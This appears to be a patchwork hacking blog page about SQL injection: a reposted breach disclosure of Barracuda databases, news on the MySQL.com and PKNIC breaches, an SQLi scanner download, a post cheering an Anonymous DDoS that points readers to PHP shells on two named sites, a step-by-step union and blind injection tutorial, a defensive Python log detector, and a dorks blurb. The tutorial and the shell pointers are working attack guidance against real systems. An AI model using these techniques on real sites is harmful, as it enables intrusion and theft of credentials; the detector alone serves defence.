sqli

Here I am, re-posting the vulnerabilities from what was previously on my website. These people really need to tighten up security.


Full Disclosure: Barracuda Networks Hacking via SQL Injection.

A disclosure by: fdf (hmsec.org cr3w)

Shout to: Sorcerer, Kill_Tech, Y0y0, Sherina84, Tr4nsltr, Upxilon, Ghimau, otak and all Malaysian Hackers

Barracuda Networks Inc. combines premises-based gateways and software, virtual appliances, cloud services, and sophisticated remote support to deliver comprehensive content security, data protection and application delivery solutions. The company’s expansive product portfolio includes offerings for protection against email, Web and IM threats as well as products that improve application delivery and network access, message archiving, backup and data protection.

Barracuda Networks’ product portfolio includes: Barracuda Spam & Virus Firewall, Barracuda Web Filter, Barracuda IM Firewall, Barracuda Web Application Firewall, Barracuda SSL VPN, Barracuda Load Balancer, Barracuda Link Balancer, Barracuda Message Archiver, Barracuda Backup Service, and the BarracudaWare software portfolio. Combining its own award-winning technology with powerful open source software, Barracuda Networks solutions deliver easy to use, comprehensive security, networking, and data protection products. Barracuda Central, an advanced 24x7 operations center manages data centers for all service-based offerings and works to continuously monitor and block the latest Internet threats.

LIST OF DATABASES:



DB NAME: NEW_BARRACUDA
TABLE NAME: DEAL_REG
DATA COUNT: Count(*) of new_barracuda.deal_reg is 17549
SAMPLE DATA:

DB NAME: NEW_BARRACUDA
TABLE NAME: CMS_LOGINS
DATA COUNT: Count(*) of new_barracuda.cms_logins is 251
DATA:

DB NAME: NEW_BARRACUDA
TABLE NAME: BUNIVERSITY_USERS
DATA COUNT: Count(*) of new_barracuda.buniversity_users is 35
DATA:

DB NAME: MYSQL
TABLE NAME: USER
DATA COUNT: Count(*) of mysql.user is 23
DATA:

DB NAME: PHP_LIVE_CHAT
TABLE NAME: CHAT_ADMIN
DATA COUNT: Count(*) of php_live_chat.chat_admin is 30
DATA:

scmagazineus.com
Oracle's MySQL.com hacked via SQL injection

File this one under ironic:

Hackers over the weekend compromised Oracle’s MySQL.com customer website via SQL injection and posted a list of usernames and passwords online.

Two Romanian hackers using the aliases “TinKode” and “NeOh” have taken responsibility for the attack and said they exploited an SQL injection flaw to break into the web servers hosting MySQL.com, a website for the popular open source database product.

The site was first outed as vulnerable in a Sunday post to the Full Disclosure mailing list by a user with the alias “Jackh4xor,” who included a list of MySQL.com internal databases and tables along with usernames and password hashes. Later on Sunday, TinKode and NeOh posted a dump of information extracted from MySQL, including the cracked passwords of users, to the text-sharing site Pastebin.

Looking at some of the cracked passwords, it’s clear that their password policies were also quite porous. According to the Sucuri Security blog, the administrative password to the MySQL Blog was 4 digits:

What is worse is that they also posted the password dump online and some people have started to crack it already. Some of the findings are pretty bad, like the password used by MySQL’s Director of Product Management, which is only 4 numbers (6661) long. Multiple admin passwords for blogs.mysql.com were also posted.

SEKURITY SQLi Scanner


1. Enter the dork list path, e.g. “C:\dorks.txt”. The list should be in the format:

dork1.php?id=

dork2.php?id=

dork3.php?id=

etc.

2. Enter the number of pages per dork to search; there are 10 results per page, and the maximum is 100 pages.

3. Enter a domain to search, for example “.co.uk”, “.nl”, “.gov”, “.edu”, etc. (blank for any).

4. Enter a keyword, for example “shop”, “paypal”, “xbox”, etc. (blank for any).

5. Set the timeout to something reasonable; ~5000 (= 5 seconds) is efficient. Something too low will be fast but will not bring back good results.

6. The yellow text that appears shows the crawled links.

7. Links shown in red while scanning are not vulnerable; green ones are vulnerable.

8. All vulnerable links are stored in the application path.

Download: http://min.us/mdh8bQM

#OpCondorLibre

An operation called #OpCondorLibre is taking place today, essentially right now. It is taking place in Ecuador and is aimed against media censorship. That is the short version, of course; unfortunately I don't know the full background. More here, hopefully: http://www.youtube.com/watch?v=BvaLJVy8xcA.

In general it is a massive DDoS attack using LOIC tools (see http://en.wikipedia.org/wiki/LOIC) in coordination with more or less skilled hackers, or, if you prefer, people who can use tools to look for security holes such as SQLi vulnerabilities and the like. By all accounts this approach is fairly common and is also used in other operations under the banner (a silly term, but I don't know how else to put it) of #Anonymous, such as #OpChile and similar. I expect that by morning I will put together a larger list of the operation's successes. For now, the very latest addition.

Someone managed to break into the website of a telecom company, http://telconet.net, and of a daily newspaper, http://www.vistazo.com. Both apparently via an SQLi vulnerability, i.e. SQL injection. If you try appending /in.php to the domain of either site, you get to some sort of PHP shell which, thanks to the security hole, lets you play with the server itself :). We'll see what comes next. Things are really moving in South America.

youtube

Windows MySQL UDF Exploitation by Hood3dRob1n

https://github.com/Hood3dRob1n/SQLi

ehackingnews.com
New #SQLi prevention system left open a vulnerability, says #PKNIC
A few days back, Pakistani top-level domains of Google, Yahoo, MSN and more sites were defaced by Turkish hackers. Following that incident, a Pakistani hacker contacted us with a report regarding the vulnerability residing in the website. We immediately notified PKNIC about the vulnerabilities.

Today, PKNIC released an official statement confirming the security breach. In an email sent to us, PKNIC informed us that the vulnerability was fixed over the weekend.

“PKNIC became aware of a vulnerability in one of its systems which caused a total of four user accounts to be breached on Friday evening 23rd November, impacting nine DNS records, out of a total of around fifty thousand. That led to several website addresses being redirected to a blank message page for a few hours. Several of these websites were mirrors of global sites such as google.pk, ebay.pk, etc.,” the official statement reads.

The changes caused by the incident were reverted by the PKNIC team within a few hours, by late Friday night. The team sent notifications to the affected accounts after the scope of the incident was identified.

The management said that the website doesn’t store credit card or similar financial information in its database.

“PKNIC servers were not hacked and continued to operate normally. However, the vulnerability briefly exposed some information which could be used to modify the DNS for the four accounts.”

PKNIC’s executive chairman Ashar Nisar said that they had applied a new, complex system to prevent SQL injection attacks before the breach itself. However, the new system inadvertently left open a vulnerability, under certain obscure conditions and contexts, that was used in the recent security breach.

“As a result, in addition to a thorough investigation of our entire site and systems, we reverted to the simpler, more robust model of filtering out everything unknown, instead of continuing to use the new system that had been tailored to the latest threats using more complicated algorithms,” he said.

The PKNIC team confirmed that there was no interruption to the root DNS or any other services provided by PKNIC. Additionally, other than the sites under the four accounts and seven DNS servers, all other .PK websites were unaffected and continued to operate normally.

Invitation for Friendly Hackers:
To improve its web security, PKNIC plans to invite hackers to test its website security. It has planned to announce a reward program for hackers who find vulnerabilities, as is done by leading global companies like Google and others.

Websites I've hacked with SQLi and tutorial [Rebel :p]

How To SQL Injection:
Check vulnerability by putting an apostrophe at the end of the URL
{Space} order by (number)– (until MySQL error)
Replace ID= with ID=(negative number or null) union all select (columns in order, i.e. 1,2,3,4,5)–
Same thing as above, just replace the number that is at the top with @@Version (if it is below 5 you need blind SQL injection)
Replace @@Version with concat/group_concat(table_name) and at the end of the list add from information_schema.tables where table_schema=database()–
Get the table names from above ^
Replace (table_name) from step four with (column_name) and information_schema.tables with information_schema.columns
Replace (column_name) with ({the column you want}{more if you want, but between them use 0x3a}) and all the stuff after from with the table
How To Blind SQL Injection:
1] Test by putting AND 1=1 at the end of the URL (this is always true)
2] Now, to check if it is vulnerable, put AND 1=2 (it is vulnerable if pictures, text, etc. are missing)
3] Now put: and substring(@@version,1,1)=4 [to check if the version is version four; if it isn’t true, change the four to a higher number]
4] Put this at the end: and (select 1)=1 [this tests subselect; if the webpage loads right, it works]
5] Put this: and (select 1 from mysql.user limit 0,1)=1 [checks if you have access to mysql.user (if the page loads right you have access)]
6] Guess tables with: and (select 1 from {Table Guess} limit 0,1)=1 [guess the table (if the page loads right it exists, if content disappears it doesn’t)]
7] Guess columns with: and (select substring(concat(1,{Column guess}),1,1) from {Table from last step} limit 0,1)=1 [guess the column (if the page loads right it exists, if content disappears it doesn’t)]
8] Get data from the database with: and ascii(substring((SELECT concat({Column from before},0x3a) from {Table from step 6} limit 0,1),1,1))>80 [0x3a is a colon to go in between the username and password (increase the number after the greater-than sign until the page loads wrong)]
9] Change to: and ascii(substring((SELECT concat({Column name},0x3a) from {Table name} limit 0,1),2,1))>99 [99 should be the number from before] [if the page loads successfully make the number (99 or whatever) higher; if it is false then lower it]
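As an added defender-side example (not from the post above, nor from any tool it names), this Python scanner flags the probing sequence the tutorial walks through when it shows up in web server access logs; the log lines, client IPs and paths are constructed.

```python
"""Flag the SQL injection probing sequence from the tutorial (apostrophe error probe,
ORDER BY enumeration, UNION SELECT, @@version, information_schema reads, AND 1=2 and
ascii(substring()) blind extraction) in web access logs, grouped by client IP."""
import re
from urllib.parse import unquote_plus

# Constructed sample lines (Apache common log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /view.php?id=463 HTTP/1.1" 200 5120
203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /view.php?id=463' HTTP/1.1" 500 812
203.0.113.7 - - [01/Jan/2024:10:00:03 +0000] "GET /view.php?id=463%20order%20by%2012-- HTTP/1.1" 200 5120
203.0.113.7 - - [01/Jan/2024:10:00:04 +0000] "GET /view.php?id=-463%20union%20all%20select%201,@@version,3,4,5-- HTTP/1.1" 200 4030
203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /view.php?id=-463%20union%20all%20select%201,group_concat(table_name),3,4,5%20from%20information_schema.tables%20where%20table_schema=database()-- HTTP/1.1" 200 4200
203.0.113.7 - - [01/Jan/2024:10:00:06 +0000] "GET /view.php?id=463%20and%201=2 HTTP/1.1" 200 2100
203.0.113.7 - - [01/Jan/2024:10:00:07 +0000] "GET /view.php?id=463%20and%20ascii(substring((select%20concat(user,0x3a,pass)%20from%20admins%20limit%200,1),1,1))>80 HTTP/1.1" 200 5120
198.51.100.9 - - [01/Jan/2024:10:00:08 +0000] "GET /view.php?id=17 HTTP/1.1" 200 5100
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+"')

# One regex per stage of the probing sequence, applied to the URL-decoded request path.
STAGES = [
    ("error_probe",   re.compile(r"=\d+'(?:\s|&|$)")),                  # id=463'
    ("column_count",  re.compile(r"\border\s+by\s+\d+", re.I)),          # order by N--
    ("union_select",  re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("fingerprint",   re.compile(r"@@version", re.I)),
    ("schema_read",   re.compile(r"\binformation_schema\.", re.I)),
    ("boolean_probe", re.compile(r"\band\s+\d+\s*=\s*\d+", re.I)),       # and 1=1 / and 1=2
    ("blind_extract", re.compile(r"\b(?:ascii|substring)\s*\(", re.I)),  # char-by-char reads
]

def classify_request(raw_path):
    """Return the set of stage names whose pattern appears in one request path."""
    decoded = unquote_plus(raw_path)
    return {name for name, pattern in STAGES if pattern.search(decoded)}

def scan_log(text):
    """Map each client IP to the union of stages it was seen performing."""
    per_ip = {}
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if match:
            stages = classify_request(match["path"])
            if stages:
                per_ip.setdefault(match["ip"], set()).update(stages)
    return per_ip

def flag_attackers(per_ip, min_stages=3):
    """A client that walks several distinct stages is running the sequence, not making a typo."""
    return sorted(ip for ip, stages in per_ip.items() if len(stages) >= min_stages)
```

Grouping by client and requiring several distinct stages keeps a single stray apostrophe in a search box from raising an alert, while the ordered sequence of stages per IP is what an analyst would use to scope which tables were reached.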

Google Dorks

We call them ‘googledorks’: Inept or foolish people as revealed by Google. Whatever you call these fools, you’ve found the center of the Google Hacking Universe!

Google dorks are at the center of Google hacking. Many hackers use Google to find vulnerable web pages and later exploit these vulnerabilities.
Once you’re familiar with them, you can incorporate security measures into your own development. I gathered some more information and put it together. Of course, this article is for educational purposes only.
